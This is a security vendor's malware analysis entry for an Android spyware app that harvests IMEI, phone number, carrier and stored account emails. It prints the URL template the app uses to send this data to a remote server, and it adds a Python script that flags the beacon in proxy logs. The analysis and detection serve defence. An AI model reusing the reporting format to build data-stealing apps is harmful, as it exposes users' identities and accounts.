Android/SndApp.A!tr.spy

Analysis

Android/SndApp.A!tr.spy targets Android mobile phones. It sends several pieces of personal information, including the victim's email addresses, to a remote web server.
The application displays a splash screen such as the one shown in Figure 1.

Figure 1. Splash screen for Android/SndApp.A!tr.spy
If you press the icon in the top right corner, a list of affiliate apps is shown (see Figure 2). Those applications come from the same developer and show the same information-leaking behaviour.

Figure 2. Affiliate applications
Those applications have been removed from the Android Market.


Technical Details


When the malware is launched, it collects:
  • phone's IMEI
  • phone number
  • network country ISO code (e.g. "fr")
  • operator's name
  • accounts memorized on the mobile phone. These are all the web accounts the end-user has the phone remember so that credentials do not need to be entered at each login. For instance, these can be Google accounts, Facebook accounts, e-Commerce accounts etc.
  • emails: the victim's email addresses. These are collected from the login names of the accounts above. When a login name looks like an email address (e.g. it contains an @), the malware assumes it is one and collects it.
This information is sent to a remote web site:
http://[REMOVED].com/android-notifier/notifier.php?
   appId=1&deviceId=IMEI&mobile=PHONENUMBER&country=ISOCOUNTRY
   &carrier=OPERATORNAME&email=EMAILS
When pressing the icon for affiliate applications, the malware issues several requests to:
http://[REMOVED]ck66.com/mt/w264y234e4z2y2/&subid1=inapp
which redirect to the related applications.
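
One way to spot the reporting request described above in web proxy logs, as an added example that is not part of the original analysis. The log line format, the sample hosts and values, and the separator between multiple email addresses are assumptions; only the path and parameter names come from the write-up.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter names as listed in the write-up. The host is redacted
# there, so matching keys on path + parameter set rather than on a domain.
BEACON_PATH = "/android-notifier/notifier.php"
BEACON_PARAMS = {"appId", "deviceId", "mobile", "country", "carrier", "email"}

def luhn_ok(digits):
    """True if the digit string passes the Luhn check used by IMEIs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch) * 2 if i % 2 else int(ch)
        total += d - 9 if d > 9 else d
    return total % 10 == 0

def classify(url):
    """Return None, or a dict describing what the request exposes."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    if not parts.path.endswith(BEACON_PATH) or not BEACON_PARAMS.issubset(query):
        return None
    imei = query["deviceId"][0]
    # Assumption: multiple addresses are joined by comma, semicolon or space.
    emails = [e for e in re.split(r"[,;\s]+", query["email"][0]) if "@" in e]
    return {
        "host": parts.hostname,
        "imei_valid": bool(re.fullmatch(r"\d{15}", imei)) and luhn_ok(imei),
        "emails": emails,
    }

def scan(lines):
    """Scan 'timestamp client method url' proxy lines (constructed format)."""
    hits = []
    for line in lines:
        ts, client, _method, url = line.split(" ", 3)
        info = classify(url)
        if info:
            hits.append({"time": ts, "client": client, **info})
    return hits

# Constructed sample lines; hosts, IMEI, phone number and addresses are made up.
SAMPLE_LOG = [
    "2020-01-01T10:00:01Z 10.0.0.23 GET http://c2.example/android-notifier/notifier.php?appId=1&deviceId=490154203237518&mobile=%2B33600000000&country=fr&carrier=ExampleTel&email=alice%40example.org,bob%40example.net",
    "2020-01-01T10:00:05Z 10.0.0.23 GET http://shop.example/notifier.php?appId=1&email=alice%40example.org",
    "2020-01-01T10:00:09Z 10.0.0.40 GET http://news.example/index.html?country=fr",
]
```

Calling scan(SAMPLE_LOG) returns one hit, for client 10.0.0.23; a hit with a Luhn-valid 15-digit deviceId and at least one email address identifies a handset whose account data has left the network.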

Recommended Action

    FortiGate Systems
  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
    FortiClient Systems
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Detection Availability

FortiGate: Extreme
FortiClient: Extended
FortiMail: Extended
FortiSandbox: Extended
FortiWeb: Extended
Web Application Firewall: Extended
FortiIsolator: Extended
FortiDeceptor: Extended
FortiEDR

Version Updates

Date Version Detail
2019-08-07 70.54800